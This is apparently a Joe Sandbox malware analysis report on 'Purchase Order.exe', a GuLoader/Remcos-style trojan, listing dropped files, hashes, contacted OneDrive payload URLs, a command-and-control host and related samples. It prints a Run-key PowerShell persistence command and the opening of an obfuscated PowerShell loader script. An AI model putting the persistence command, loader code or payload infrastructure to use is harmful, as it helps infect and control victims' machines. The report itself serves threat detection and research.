                        https://kxwbha.am.files.1drv.com/Ultradolichocephaly.exe, 00000007.00000002.3203656499.000000000784A000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://nsis.sf.net/NSIS_ErrorErrorPurchase Order.exe, 00000000.00000000.1953867569.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Purchase Order.exe, 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpfalse
                            		high
                            https://kxwbha.am.files.1drv.com/y4mpeceYAMLWx5PShbJGMk6tKW6mQBechZgu3aTbJoU6yxz1XJ53X1sSgh53U1m7pv4Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://aka.ms/pscore6lBsqpowershell.exe, 00000002.00000002.2746622815.0000000004901000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://onedrive.live.com/Ultradolichocephaly.exe, 00000007.00000002.3203656499.0000000007828000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://onedrive.live.com/4w7Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://kxwbha.am.files.1drv.com/4Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://nsis.sf.net/NSIS_ErrorUltradolichocephaly.exe, Ultradolichocephaly.exe, 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpfalse
                                          		high
                                          http://crl.micropowershell.exe, 00000002.00000002.2749734497.00000000071DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://geoplugin.net/Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • 3%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://contoso.com/powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://geoplugin.net/json.gpNUltradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://kxwbha.am.files.1drv.com/DUltradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://geoplugin.net/t:Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://geoplugin.net/json.gpWUltradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2746622815.0000000004901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://geoplugin.net/wUltradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://kxwbha.am.files.1drv.com/pFUltradolichocephaly.exe, 00000007.00000003.2721255135.00000000078B9000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2738950429.00000000078B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  13.107.137.11
                                                  		dual-spov-0006.spov-msedge.netUnited States
                                                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  103.253.17.222
                                                  		tochisglobal.ddns.netunknown
                                                  		59139WIFIKU-AS-IDPTWifikuIndonesiaIDtrue
                                                  178.237.33.50
                                                  		geoplugin.netNetherlands
                                                  		8455ATOM86-ASATOM86NLfalse

                                                  General Information

                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1440304
                                                  Start date and time:2024-05-13 06:02:05 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 6m 48s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:11
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Purchase Order.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@13/12@4/3
                                                  EGA Information:
                                                  • Successful, ratio: 33.3%
                                                  HCA Information:
                                                  • Successful, ratio: 90%
                                                  • Number of executed functions: 94
                                                  • Number of non-executed functions: 75
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                                  • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-am-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-am-files-brs.onedrive.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target Ultradolichocephaly.exe, PID 6008 because there are no executed function
                                                  • Execution Graph export aborted for target powershell.exe, PID 1492 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  06:02:49API Interceptor40x Sleep call for process: powershell.exe modified
                                                  06:04:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Announces %Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)
                                                  06:04:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Announces %Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)
                                                  06:04:41API Interceptor4x Sleep call for process: Ultradolichocephaly.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  13.107.137.11Payment Remittance Advice_000000202213.xlsbGet hashmaliciousUnknownBrowse
                                                  • onedrive.live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU
                                                  103.253.17.222JPEG00774533.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    CamScanner0091.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      PI00232.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                        178.237.33.50x1TYUNtEO1zz.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        xq5lqKlBeIAJ.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        1715327885f20f31f2f517c98cb2c7e927c5676435d894ec2de190282251b350f38ab136db927.dat-decoded.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        Palmebladstag.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        2024090533201.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        JaXXnpJZ3z.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        payment_0045k.xlsGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        License authorization Custom invoice INFO - Factura Aduana INFO (2).xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        #U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        IW7w68n6vf.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • geoplugin.net/json.gp

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        dual-spov-0006.spov-msedge.netPurchase Order is approved20240509.cmdGet hashmaliciousDBatLoaderBrowse
                                                        • 13.107.137.11
                                                        JaXXnpJZ3z.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • 13.107.137.11
                                                        payment_0045k.xlsGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • 13.107.137.11
                                                        https://1drv.ms/u/s!AvRvEmgJ5d9kgly3z-uh2_ANgH5hGet hashmaliciousUnknownBrowse
                                                        • 13.107.139.11
                                                        https://1drv.ms/u/s!AvRvEmgJ5d9kgly3z-uh2_ANgH5hGet hashmaliciousUnknownBrowse
                                                        • 13.107.139.11
                                                        https://1drv.ms/u/s!AvRvEmgJ5d9kgly3z-uh2_ANgH5hGet hashmaliciousUnknownBrowse
                                                        • 13.107.137.11
                                                        5bsgSbGQhc.rtfGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • 13.107.137.11
                                                        thelevel.docGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • 13.107.137.11
                                                        BankSwift.xlsGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • 13.107.137.11
                                                        htm.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • 13.107.139.11
                                                        tochisglobal.ddns.netJPEG00774533.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 103.253.17.222
                                                        CamScanner0091.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 103.253.17.222
                                                        PI00232.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 103.253.17.222
                                                        geoplugin.netx1TYUNtEO1zz.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        xq5lqKlBeIAJ.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        1715327885f20f31f2f517c98cb2c7e927c5676435d894ec2de190282251b350f38ab136db927.dat-decoded.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        Palmebladstag.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        2024090533201.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        JaXXnpJZ3z.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        payment_0045k.xlsGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        License authorization Custom invoice INFO - Factura Aduana INFO (2).xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        #U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        IW7w68n6vf.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        MICROSOFT-CORP-MSN-AS-BLOCKUSSoa as at (Apr - 24).exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.213.69
                                                        Refunded.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                        • 13.107.213.70
                                                        qMh36Rvh4J.elfGet hashmaliciousMiraiBrowse
                                                        • 21.189.222.8
                                                        h5jtx8DXVf.elfGet hashmaliciousUnknownBrowse
                                                        • 104.214.47.115
                                                        z5tLjmo4GP.elfGet hashmaliciousMiraiBrowse
                                                        • 191.237.255.164
                                                        HepvgtsxX7.elfGet hashmaliciousMiraiBrowse
                                                        • 21.17.99.121
                                                        Gj3ajUucBo.elfGet hashmaliciousMiraiBrowse
                                                        • 52.245.21.242
                                                        EE9yU8bN9i.elfGet hashmaliciousUnknownBrowse
                                                        • 20.195.77.115
                                                        X7xw44e4Ob.elfGet hashmaliciousMiraiBrowse
                                                        • 22.10.43.230
                                                        4DSN0Zi9Og.elfGet hashmaliciousUnknownBrowse
                                                        • 20.163.151.43
                                                        WIFIKU-AS-IDPTWifikuIndonesiaIDJPEG00774533.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 103.253.17.222
                                                        CamScanner0091.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 103.253.17.222
                                                        PI00232.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 103.253.17.222
                                                        Spare_part_list.xlsGet hashmaliciousLokibotBrowse
                                                        • 103.253.17.249
                                                        57m#U00b3_LPG_SEMI_TRAILER_7_NOS.pdf.xlsGet hashmaliciousAgentTeslaBrowse
                                                        • 103.253.17.249
                                                        EUCjx7V4L9.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 116.0.5.90
                                                        ATOM86-ASATOM86NLx1TYUNtEO1zz.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        xq5lqKlBeIAJ.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        1715327885f20f31f2f517c98cb2c7e927c5676435d894ec2de190282251b350f38ab136db927.dat-decoded.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        Palmebladstag.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        2024090533201.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        JaXXnpJZ3z.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        payment_0045k.xlsGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        License authorization Custom invoice INFO - Factura Aduana INFO (2).xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        #U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50
                                                        IW7w68n6vf.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                        • 178.237.33.50

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        37f463bf4616ecd445d4a1937da06e19fx28wfnZ4J.exeGet hashmaliciousBabuk, Djvu, PrivateLoader, SmokeLoaderBrowse
                                                        • 13.107.137.11
                                                        uJ5c4dQ44E.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.137.11
                                                        uJ5c4dQ44E.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.137.11
                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                        • 13.107.137.11
                                                        file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                        • 13.107.137.11
                                                        YN9hIXWLJ3.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.137.11
                                                        SecuriteInfo.com.FileRepMalware.16991.21545.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.137.11
                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                        • 13.107.137.11
                                                        Form_W-9_Ver-083_030913350-67084228u8857-460102.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                        • 13.107.137.11
                                                        MSI.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                        • 13.107.137.11

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):965
                                                        Entropy (8bit):5.001941246976737
                                                        Encrypted:false
                                                        SSDEEP:12:tk90nd6UGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qydVauKyGX85jrvXhNlT3/7sYDsro
                                                        MD5:78C8B1980A44EC0056916F33798215A6
                                                        SHA1:702E41B4FE247C110995FD536D130321A2F8A73B
                                                        SHA-256:417ADAFBA3D3171CC83ABA06E8170014BEDD2952EF87C74621CB72FE39B6C9E4
                                                        SHA-512:E82F0524E13FECC3DFD8D30CB9AD6C55B17F95924EC5AB15F8A6424411437A937AB0FE1D54993B1B07301EE7649A6344ED8C59B1C96997C01CB205DA32A80C09
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{. "geoplugin_request":"191.101.61.26",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):8003
                                                        Entropy (8bit):4.838950934453595
                                                        Encrypted:false
                                                        SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                        MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                        SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                        SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                        SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                        C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:dropped
                                                        Size (bytes):580232
                                                        Entropy (8bit):7.278907180417852
                                                        Encrypted:false
                                                        SSDEEP:12288:ja+TesAUQUC4Mpx3Y1JbSd+xQgVN9pmdVepFq:28esAfUPGI1h3RHY8rq
                                                        MD5:996CD1A4008E0FCA3750E9524BD13A9D
                                                        SHA1:F202D20579BA03ACB804F651BF66E2AB47ADD4C8
                                                        SHA-256:00473AE2A9E945343456D0193E1A5FE58C71776F42E747249A3C435B8CE7E1BB
                                                        SHA-512:8B71BEB452CB4F03F6E9FC897EC1164F5EC8E547D3C6EE57AB5C07CCA22D5CD71371F8DEE45CB63E7BEC838DC4B30B34A187B5E81439B3E71553B35A71F9E7B2
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        • Antivirus: Virustotal, Detection: 21%, Browse
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....c.W.................`...|.......1.......p....@.......................................@.................................4u......................0...X............................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...................................rsrc............ ...~..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5svqmygh.j3v.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gcqj3yz5.gkm.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac

                                                        Download File
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:ASCII text, with very long lines (54742), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):54742
                                                        Entropy (8bit):5.3420724390824335
                                                        Encrypted:false
                                                        SSDEEP:768:Zr3HLXpjUO3JeU2JLhAowJbUPrtzDuJ+DUn6fdq/NJik8Cd9aLrVwAtgCh4xMWYG:F3HFjzIhHwVUZDhDUn6Fckk8X9tLk5
                                                        MD5:018320E11E60BB8E3984A6A7E0C4AA62
                                                        SHA1:924A0B4842B51F8D33B5C3998CADC17A945EC395
                                                        SHA-256:DBB582447B41B996AFC08D70E36632A91291EB6980C6B0B25D22B0AC6963AE94
                                                        SHA-512:8F90013F22DACCB297681BD2280A441D3BE4F773749A6B41C12FECBC9CE0FB898C8FC446B83A717D4E74FE5E17D2D470E4AAA600150020D0C3A64FBDB3FDC174
                                                        Malicious:true
                                                        Preview:$Triumferne=$Sprgetid;<#Communicability Dzungar Hjernesvulsterne Knitren Ksnehandlen #><#Dotonidae Unsoothed Engsnarers #><#Indico unswooning Spagfrdigstes Epiplankton Biskoppeligt Provinsens #><#Resinbush Multicentric Fangotherapy Indersider Kistebunden undisputedness #><#Ledsag Haglike Aflokket #><#Landingens Kartoteksprogrammernes Regnearksprogrammets Renoveringerne enzymic #>$Acrestaff = "Quadr; ConfFStabbuCa,cinConducSupert DeroiynkenoThyrinNegat RuneVth,aze,dsknr StrabQuidaePaa.an.asplaMill lPolypiPreflnMispl Sejrs(Overd`$ReatiZMin aogendin KabeeunderimuddenS.aaed prindEnchaeChalllLysbaiinternBulksgRentae dolknMa,rosDomsf,Koord .ouri`$pyo eTBungar,talwsAtel,kTandkeEvolem JernaSatses Arm.k,iliai AntinT dddeByggerGaribnA.ndseAnbef No pr=Qui t Jagtu0,aang)Con,u{nonf,.,alku`$ArmstOSubarm ButtbcalatuHartvdFagted .neee Lengt,alut= Vice-In.ek4Bekmp0Typom8 Cata2Fores4Taag.+K.mpo4 Cerv0.haps8Speku2Subli6Grad,; Sk t Dolla Sorte Festu Terra`$R magSUnwaryPattasGder tUn oueUndermJuttasTempek

                                                        C:\Users\user\AppData\Local\potentially\Avantgarders\Forplejningers14.Wat

                                                        Download File
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):315171
                                                        Entropy (8bit):7.745198370059857
                                                        Encrypted:false
                                                        SSDEEP:6144:lAn349ds/cjESEPhWlxjk2u0Rf6gVZJxap1+b4JU4Svm8wmW:lAn6d5jE7KQN0RbVZJO1Y/+8fW
                                                        MD5:C1FBA61F3748F78794EC70903F7FFAEE
                                                        SHA1:0E2C3A91817C8E947E9AE29C829FA032C9749555
